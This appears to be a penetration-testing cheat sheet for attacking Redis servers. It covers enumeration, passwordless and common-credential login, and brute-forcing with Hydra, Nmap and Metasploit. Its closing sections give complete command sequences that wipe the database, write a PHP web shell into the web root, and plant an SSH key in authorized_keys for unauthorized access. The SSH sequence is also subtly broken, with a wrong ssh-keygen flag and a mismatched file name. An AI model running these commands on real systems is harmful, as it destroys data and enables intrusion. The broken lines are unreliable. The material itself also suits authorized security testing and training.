Skip to main content

Redis

Default Port: 6379

Redis, an open-source tool licensed under BSD, functions as an in-memory data structure store, renowned for its key-value storage system and support for diverse data types. It serves multiple roles such as a database, caching layer, and message broker. Although it typically communicates via a simple, plaintext protocol, it's important to emphasize its ability to secure communications with SSL/TLS encryption.

Granting unauthenticated access to Redis or utilizing common credentials can pose significant security risks, potentially exposing sensitive data and transactions to unauthorized users.

Connect

Connect Using redis-cli Command

redis-cli -h <hostname> -p <port-number> --user <username> -a <password>

#port number is optional
#username is optional
#password is optional

URL

The Redis connection URL is a line containing all the information necessary for an application to connect to a Redis database. A typical format is as follows:

redis://:<password>@<hostname>:<port>

Enumeration

Identifying an Redis Server

You can use Nmap to check if there's an Redis server on a target host like this:

nmap -p 6379 X.X.X.X

Assessment with Metasploit

Metasploit's Redis modules scan redis servers for security risks such as weak credentials or access controls, improving overall security.

use auxiliary/scanner/redis/redis_server
msf auxiliary(scanner/redis/redis_server) > set rhosts X.X.X.X
msf auxiliary(scanner/redis/redis_server) > exploit

You can use Netcat to find out what service is running and its version by looking at the welcome message it shows when you connect. This method is called Banner Grabbing.

nc -nv X.X.X.X 6379

Attack Vectors

Passwordless Authentication

Redis allows users to connect to a server without needing a specific identity by utilizing a passwordless login feature.

To connect without a password, you would use the following command:

redis-cli -h X.X.X.X

Common Credentials

If passwordless login is disabled on a Redis server, a good first step is to try common usernames and passwords such as admin, administrator, root, user or test. This approach is less aggressive than trying to guess passwords by brute force and is recommended to be tried first when accessing a server.

redis-cli -h X.X.X.X --user <username> -a <password>

#provide a common username
#provide a common password

Bruteforcing Credentials

A brute-force attack involves trying many passwords or usernames to find the right one for accessing a system.

Tools like Hydra are designed for cracking into networks and can be used on services like Redis, HTTP, SMB, etc. For Redis, Hydra often carries out a dictionary attack, which means it uses a list of possible usernames and passwords from a file to try and log in.

Bruteforcing with Hydra

To use Hydra for brute-forcing Redis login credentials, you would use a command structured for this purpose:

hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S port] redis://X.X.X.X

Bruteforcing with Nmap

It is also possible to perform brute force on Redis with Nmap scripts:

nmap -p 6379 --script redis-brute X.X.X.X

Bruteforcing with Metasploit

It is also possible to apply brute force with Metasploit modules on Redis:

use auxiliary/scanner/redis/redis_login
msf auxiliary(scanner/redis/redis_login) > set rhosts X.X.X.X
msf auxiliary(scanner/redis/redis_login) > set user_file /path/to/user.txt
msf auxiliary(scanner/redis/redis_login) > set pass_file /path/to/pass.txt
msf auxiliary(scanner/redis/redis_login) > set stop_on_success true
msf auxiliary(scanner/redis/redis_login) > exploit

Post-Exploitation

Common Redis Commands

This table provides a clear overview of each command's function within Redis and how they are used, covering a broad spectrum of database management tasks.

CommandDescriptionUsage
SETSets the value of a keySET key value
GETGets the value of a keyGET key
DELDeletes one or more keysDEL key1 [key2 ...]
KEYSLists all keys matching a patternKEYS pattern
EXPIRESets an expiration time on a keyEXPIRE key seconds
TTLGets the remaining time to live of a keyTTL key
INCRIncrements the value of a keyINCR key
DECRDecrements the value of a keyDECR key
LPUSHPrepends one or multiple values to a listLPUSH key value [value ...]
RPUSHAppends one or multiple values to a listRPUSH key value [value ...]
LPOPRemoves and gets the first element in a listLPOP key
RPOPRemoves and gets the last element in a listRPOP key
SADDAdds one or more members to a setSADD key member [member ...]
SMEMBERSGets all members in a setSMEMBERS key
ZADDAdds one or more members to a sorted setZADD key score member [score member ...]
ZRANGEReturns a range of members in a sorted setZRANGE key start stop [WITHSCORES]
HSETSets field in the hash stored at keyHSET key field value [field value ...]
HGETGets the value of a field in a hash stored at keyHGET key field
HDELDeletes one or more fields from a hash stored at keyHDEL key field [field ...]
HMSETSets multiple fields in a hash stored at key (Use HSET for Redis 4.0.0 and above)HMSET key field1 value1 [field2 value2 ...]

Exploiting Redis for Remote Code Execution

The sequence of commands provided demonstrates a method to exploit Redis instances for uploading and executing a PHP web shell on a target server. This technique leverages the flexibility of Redis to modify its configuration and misuse its data persistence capabilities to inject malicious code into a web-accessible directory.

$ redis-cli -h X.X.X.X flushall
$ redis-cli -h X.X.X.X set pwn '<?php system($_REQUEST['cmd']); ?>'
$ redis-cli -h X.X.X.X config set dbfilename shell.php
$ redis-cli -h X.X.X.X config set dir /var/www/html
$ redis-cli -h X.X.X.X save

Unauthorized SSH Access via Redis Exploitation

This set of commands demonstrates an exploitation method that uses Redis to insert an SSH public key into the authorized_keys file of a Redis server, effectively allowing unauthorized SSH access to the server.

$ ssh-keygen -t ecdsa -s 521 -f key
$ (echo -e "\n\n"; cat key.pub; echo -e "\n\n") > key.txt
$ redis-cli -h X.X.X.X flushall
$ cat foo.txt | redis-cli -h X.X.X.X -x set pwn
$ redis-cli -h X.X.X.X config set dbfilename authorized_keys
$ redis-cli -h X.X.X.X config set dir /var/lib/redis/.ssh
$ redis-cli -h X.X.X.X save